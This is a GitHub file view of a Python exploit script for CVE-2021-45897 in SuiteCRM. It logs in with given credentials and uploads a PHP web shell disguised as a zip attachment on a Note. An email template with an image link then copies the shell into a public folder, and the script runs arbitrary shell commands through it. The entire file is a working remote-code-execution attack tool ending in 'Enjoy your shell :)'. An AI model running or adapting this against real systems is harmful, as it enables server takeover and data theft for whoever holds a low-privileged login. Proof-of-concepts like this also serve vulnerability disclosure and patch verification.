-
Notifications
You must be signed in to change notification settings - Fork 7
/
exploit.py
executable file
·127 lines (108 loc) · 4.83 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python3
import requests
import click
import logging
from bs4 import BeautifulSoup
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("CVE-2021-45897")
@click.command("CVE-2021-45897",
epilog="https://github.com/manuelz120/CVE-2021-45897")
@click.option(
"--host",
'-h',
default="http://localhost",
help="Root of SuiteCRM installation. Defaults to http://localhost")
@click.option("--username", '-u', prompt="Username> ", help="Username")
@click.option("--password",
'-p',
prompt="Password> ",
help="password",
hide_input=True)
@click.option("--payload",
'-P',
help="Shell command to be executed on target system",
default='whoami')
@click.option("--is_core",
'-d',
default=False,
help="SuiteCRM Core (>= 8.0.0). Defaults to False")
def main(host: str, username: str, password: str, payload: str, is_core: bool):
host = f"{host}/legacy" if is_core else host
session = requests.Session()
login_response = session.post(f'{host}/index.php',
data={
"module": "Users",
"action": "Authenticate",
"user_name": username,
"username_password": password,
})
if "&action=Login" in login_response.url:
logger.error(
"Login didn't work. Are you sure you specified the correct parameters?"
)
exit(-1)
logger.info(f"Login did work - Planting webshell as Note")
# Plan note with webshell payload
response = session.post(f'{host}/index.php',
data={
'module': 'Notes',
'action': 'Save',
'isDuplicate': 'false',
'name': 'Innocent Attachment',
'return_module': 'Notes',
'return_action': 'DetailView',
'relate_to': 'Notes',
'offset': 1,
'parent_type': 'Accounts',
'deleteAttachment': 0,
},
files={
'filename_file':
('exploit.zip', open('webshell.php',
'rb'), 'application/zip')
},
headers={'Referer': host})
if "/legacy" in host:
note_id = response.text.split('&return_id=')[1].split("'")[0]
else:
note_id = response.text.split('_form.return_id.value=')[1].split(
"'")[1]
if not note_id:
logger.error("Failed to create note with malicious payload")
exit(-1)
logger.info(f"Note with paylaod located @ {note_id}")
extension = "php"
# Create email template to copy payload
base_host = host.replace('/legacy', '')
email_template = f"<img src=\"{base_host}/index.php?entryPoint=download&type=Notes&id={note_id}&filename=pwned.{extension}\" />"
response = session.post(f'{host}/index.php',
data={
'module': 'EmailTemplates',
'action': 'Save',
'name': 'Pwned from script',
'return_module': 'EmailTemplates',
'return_action': 'index',
'relate_to': 'Notes',
'offset': 1,
'text_only': 0,
'mce_0': email_template,
'body_html': email_template
},
headers={'Referer': host})
expected_payload_url = f"/public\/{note_id}.{extension}"
if expected_payload_url in response.text:
payload_url = f"{host}/public/{note_id}.{extension}"
logger.info(f"Successfully planted payload at {payload_url}")
logger.info(f"Verifying web shell by executing command: '{payload}'")
response = session.get(f"{payload_url}", params={'cmd': payload})
soup = BeautifulSoup(response.text, 'html.parser')
result = soup.find(id="output").string.strip()
logger.info("------ Starting command output ------")
logger.info(result)
logger.info("------ Ending command output ------")
logger.info("Enjoy your shell :)")
else:
logger.error(
f"Something went wrong. Status code: {response.status_code}")
if __name__ == "__main__":
main()